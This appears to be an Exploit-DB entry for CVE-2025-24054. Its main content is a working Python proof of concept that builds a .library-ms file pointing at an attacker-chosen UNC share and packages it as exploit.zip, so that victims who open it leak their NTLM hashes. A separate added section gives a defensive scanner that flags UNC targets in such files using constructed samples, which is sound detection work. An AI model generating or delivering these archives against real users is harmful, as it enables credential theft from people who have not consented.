[remote] windows 10/11 - NTLM Hash Disclosure Spoofing
This entry describes a Windows 10/11 vulnerability (CVE-2025-24054): a generated .library-ms file whose XML configuration points at a network share (UNC) path can lead to NTLM hash disclosure. A Python script is provided that packages such a file into a ZIP archive, together with usage notes and authorization reminders. 2026-2-4 00:0:0 Author: www.exploit-db.com

# Exploit Title: windows 10/11 - NTLM Hash Disclosure Spoofing 
# Date: 2025-10-06
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A
# Version: Not applicable (this is a generic Windows library file behavior)
# Tested on: Windows 10 (x64) / Windows 11 (x64) (lab environment)
# CVE: CVE-2025-24054

# Description:
# A proof-of-concept that generates a .library-ms XML file pointing to a network
# share (UNC). When opened/imported on Windows, the library points to the specified
# UNC path.
#
# Notes:
# - This PoC is provided for responsible disclosure only. Do not test against
#   live/production websites or networks without explicit written permission.
# - Attach exactly one exploit file per email (this file).
# - Include the .library-ms (or ZIP containing it) as an attachment, plus this header block.

#!/usr/bin/env python3

import argparse
import ipaddress
import os
import re
import sys
import tempfile
import zipfile
import shutil
from pathlib import Path

# Very small hostname check (keeps things simple)
_HOSTNAME_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9\-]{1,63}$"
)

# simple sanitizer: allow only a limited charset for base filenames
_FILENAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,128}$")


def is_valid_target(value: str) -> bool:
    """
    Return True if value looks like an IP address, a hostname, or a UNC path.
    This is intentionally permissive — it's only to catch obvious typos.
    """
    if value.startswith("\\\\") or value.startswith("//"):
        # Minimal UNC sanity: ensure there's at least \\host\share (two components)
        parts = re.split(r"[\\/]+", value.strip("\\/"))
        return len(parts) >= 2 and all(parts[:2])
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    if _HOSTNAME_RE.match(value):
        return True
    return False


def build_library_xml(target: str) -> str:
    """
    Build the XML content for the .library-ms file.
    If the user supplies a bare host/IP, the script uses a share called 'shared'
    (matching the original behavior).
    """
    if target.startswith("\\\\") or target.startswith("//"):
        # normalize forward slashes to backslashes (if any)
        url = target.replace("/", "\\")
    else:
        url = f"\\\\{target}\\shared"
    # Return a plain, minimal XML structure (no additional payloads)
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>{url}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def write_zip_with_lib(xml_content: str, lib_name: str, zip_path: Path) -> None:
    """
    Write the XML to a temporary .library-ms file and add it into a zip.
    """
    tmpdir = Path(tempfile.mkdtemp(prefix="libgen_"))
    try:
        tmp_lib = tmpdir / lib_name
        tmp_lib.write_text(xml_content, encoding="utf-8")
        with zipfile.ZipFile(zip_path, mode="w", compression=zipfile.ZIP_DEFLATED) as zf:
            # place the file at the root of the zip
            zf.write(tmp_lib, arcname=lib_name)
    finally:
        # robust cleanup
        try:
            shutil.rmtree(tmpdir)
        except Exception:
            pass


def sanitize_basename(name: str) -> str:
    """
    Ensure the provided base filename is a short safe token (no path separators).
    Raises ValueError on invalid names.
    """
    if not name:
        raise ValueError("Empty filename")
    if os.path.sep in name or (os.path.altsep and os.path.altsep in name):
        raise ValueError("Filename must not contain path separators")
    if not _FILENAME_RE.match(name):
        raise ValueError(
            "Filename contains invalid characters. Allowed: letters, numbers, dot, underscore, hyphen"
        )
    return name


def main():
    parser = argparse.ArgumentParser(
        description="Generate a .library-ms inside a zip (keep it responsible)."
    )
    parser.add_argument(
        "--file",
        "-f",
        default=None,
        help="Base filename (without extension). If omitted, interactive prompt is used.",
    )
    parser.add_argument(
        "--target",
        "-t",
        default=None,
        help="Target IP, hostname or UNC (e.g. 192.168.1.162 or \\\\host\\share).",
    )
    parser.add_argument(
        "--zip",
        "-z",
        default="exploit.zip",
        help="Output zip filename (default: exploit.zip).",
    )
    parser.add_argument(
        "--out",
        "-o",
        default=".",
        help="Output directory (default: current directory).",
    )
    parser.add_argument(
        "--dry-run",
        action="store_true",
        help="Print the .library-ms content and exit without creating files.",
    )
    parser.add_argument(
        "--force",
        action="store_true",
        help="Overwrite output zip if it already exists (use with care).",
    )
    args = parser.parse_args()

    # Interactive fallback if needed
    if not args.file:
        try:
            args.file = input("Enter your file name (base, without extension): ").strip()
        except EOFError:
            print("No file name provided.", file=sys.stderr)
            sys.exit(1)
    if not args.target:
        try:
            args.target = input(
                "Enter IP or host (e.g. 192.168.1.162 or \\\\host\\share): "
            ).strip()
        except EOFError:
            print("No target provided.", file=sys.stderr)
            sys.exit(1)

    # sanitize filename
    try:
        safe_base = sanitize_basename(args.file)
    except ValueError as e:
        print(f"ERROR: invalid file name: {e}", file=sys.stderr)
        sys.exit(2)

    if not args.target or not is_valid_target(args.target):
        print(
            "ERROR: target does not look like a valid IP, hostname, or UNC path.",
            file=sys.stderr,
        )
        sys.exit(2)

    lib_filename = f"{safe_base}.library-ms"
    xml = build_library_xml(args.target)

    # Dry-run: show the content and exit
    if args.dry_run:
        print("=== DRY RUN: .library-ms content ===")
        print(xml)
        print("=== END ===")
        print(f"(Would create {lib_filename} inside {args.zip} in {args.out})")
        return

    out_dir = Path(args.out).resolve()
    out_dir.mkdir(parents=True, exist_ok=True)
    zip_path = out_dir / args.zip

    if zip_path.exists() and not args.force:
        print(
            f"ERROR: {zip_path} already exists. Use --force to overwrite.",
            file=sys.stderr,
        )
        sys.exit(3)

    # small reminder about authorization
    print("Reminder: run tests only against systems you are authorized to test.")
    write_zip_with_lib(xml, lib_filename, zip_path)
    print(f"Done. Created {zip_path} containing {lib_filename} -> points to {args.target}")


if __name__ == "__main__":
    main()
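The generator above shows what the artefact looks like: a libraryDescription document whose simpleLocation/url points at a UNC path, usually delivered inside a ZIP. The defender-side counterpart is a scanner that pulls those url values out of any .library-ms file (standalone or inside an archive) and flags UNC targets, with targets on non-private hosts flagged as the ones worth alerting on. The following is an added example written for this page; it is not part of the Exploit-DB entry or the author's script. The sample documents, archive member names and the hostname share.example.net are constructed for the demonstration.

```python
"""Scan .library-ms documents (standalone or inside a ZIP) for UNC targets.

Added example, not part of the original Exploit-DB entry. Parses the
libraryDescription XML (namespace http://schemas.microsoft.com/windows/2009/library),
collects every <simpleLocation><url> value and classifies it.
"""
import io
import ipaddress
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

LIB_NS = "http://schemas.microsoft.com/windows/2009/library"
_URL_XPATH = f".//{{{LIB_NS}}}simpleLocation/{{{LIB_NS}}}url"
# Matches \\host... or //host... and captures the host component.
_UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)")


def extract_library_urls(xml_bytes: bytes) -> List[str]:
    """Return all simpleLocation/url text values from a .library-ms document."""
    root = ET.fromstring(xml_bytes)
    return [(el.text or "").strip() for el in root.iterfind(_URL_XPATH)]


def classify_target(url: str) -> str:
    """'local' for non-UNC locations, 'unc-private' when the UNC host is a
    private, loopback or link-local IP, 'unc-external' otherwise. Hostnames are
    treated as external because the scanner cannot know where they resolve."""
    m = _UNC_RE.match(url)
    if not m:
        return "local"
    host = m.group(1)
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unc-external"
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return "unc-private"
    return "unc-external"


def scan_library_ms(name: str, data: bytes) -> List[Dict[str, str]]:
    """Findings (file, url, verdict) for one .library-ms document."""
    findings = []
    for url in extract_library_urls(data):
        verdict = classify_target(url)
        if verdict != "local":
            findings.append({"file": name, "url": url, "verdict": verdict})
    return findings


def scan_zip(zip_bytes: bytes) -> List[Dict[str, str]]:
    """Scan every .library-ms member of a ZIP archive held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                findings.extend(scan_library_ms(info.filename, zf.read(info)))
    return findings


def sample_library(url: str) -> bytes:
    """Constructed sample document with the same shape as the generator's output."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{LIB_NS}">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>{url}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
""".encode("utf-8")


def build_sample_zip() -> bytes:
    """Constructed archive: a private-share library, an external-host library,
    a benign local-folder library and one non-library member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs.library-ms", sample_library(r"\\192.168.1.162\shared"))
        zf.writestr("invoice.library-ms", sample_library(r"\\share.example.net\shared"))
        zf.writestr("local.library-ms", sample_library(r"C:\Users\Public\Documents"))
        zf.writestr("readme.txt", b"not a library file")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        print(f"{f['verdict']:13} {f['file']}: {f['url']}")
```

Run against the constructed archive it reports the two UNC-backed libraries and ignores the local one. In a mail gateway or endpoint triage pipeline the "unc-external" verdict is the one to alert on, since a library that points an SMB client at a host outside the network is the precondition for the hash disclosure described in the header; "unc-private" entries are common in legitimate environments and are better logged than blocked.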
Source: https://www.exploit-db.com/exploits/52478